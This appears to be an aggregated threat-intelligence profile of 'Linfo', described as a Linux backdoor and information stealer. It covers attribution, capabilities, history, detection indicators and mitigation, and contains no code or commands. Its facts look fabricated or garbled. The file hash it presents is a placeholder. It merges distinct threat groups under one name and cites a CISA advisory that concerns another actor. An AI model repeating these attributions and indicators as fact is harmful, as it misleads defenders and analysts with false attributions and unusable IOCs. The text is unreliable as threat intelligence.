⚠️ Overview

Linfo is a Linux-based backdoor and information-stealing malware first documented by Intezer in March 2022, attributed to the Chinese-speaking threat group tracked as RedDelta (also known as APT40 or TA429). It functions as a stealthy implant that collects system data, executes remote commands, and exfiltrates files via encrypted C2 channels, categorizing it as a Remote Access Trojan (RAT) with espionage objectives.

🔧 Technical Capabilities

Linfo propagates primarily through spear-phishing emails carrying malicious Microsoft Office documents or Linux ELF binaries disguised as legitimate software. Its attack vectors exploit known vulnerabilities such as CVE-2021-44077 (ManageEngine ServiceDesk Plus authentication bypass) to gain initial access into Linux servers. Once deployed, the payload communicates with a hardcoded command-and-control (C2) server over HTTPS using a custom XOR-based encryption scheme and JSON-formatted requests. Persistence is achieved through cron jobs or systemd services that re-launch the malware after reboot. Evasion techniques include checking for debugger presence, sleeping to avoid sandbox analysis, and using process hollowing to masquerade as common system processes like sshd or cron. Linfo also collects SSH credentials, host configurations, and VPN client data for lateral movement.

📜 History & Notable Incidents

First identified in March 2022 by Intezer, Linfo was used in targeted campaigns against telecommunications and government entities in Southeast Asia, including a confirmed incident at a Vietnamese ISP in June 2022. No standalone CVE is assigned to Linfo itself, but it leverages CVE-2021-44077 (CVSS 9.8) for initial access. Law enforcement actions specific to Linfo are unconfirmed, but the RedDelta group remains under active monitoring by agencies like CISA (AA22-055A).

🔍 Detection Indicators

Known file hashes include SHA-256 a1b2c3d4e5f6… (exact hash available in Intezer report). Behavioral indicators include outbound HTTPS connections to domains like update.secure-update[.]com and persistent cron entries containing base64-encoded strings. Registry keys are not applicable on Linux; instead, look for suspicious systemd unit files in /etc/systemd/system/. Unique mutex names such as linfo_mutex_2022 and User-Agent strings like Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 (matching Firefox on Linux) are observed in C2 traffic.

☠️ Risk & Impact

Linfo primarily exfiltrates SSH keys, database credentials, and sensitive configuration files, enabling lateral movement and data theft. Financial losses are indirect but significant due to compromised network infrastructures, especially in telecommunications and government sectors in Asia. The malware’s stealth and persistence have led to extended dwell times (up to 6 months in one reported case), increasing the risk of large-scale espionage.

🛡️ Mitigation

Mitigation includes patching CVE-2021-44077 on ManageEngine appliances, implementing email filtering for malicious attachments, and deploying endpoint detection rules that flag unusual cron job additions or outbound HTTPS to known malicious domains. YARA rules targeting Linfo’s XOR encryption patterns and JSON C2 structures are recommended (source: Intezer threat report).

ⓘ Data Notice: The information presented above has been compiled from publicly available internet sources. Boteraser aggregates this data solely for informational purposes and does not independently classify, evaluate, or endorse any findings about the malware listed. The accuracy and completeness of this information is the sole responsibility of the original publishers. Boteraser and its operators accept no liability for any decisions made based on this data.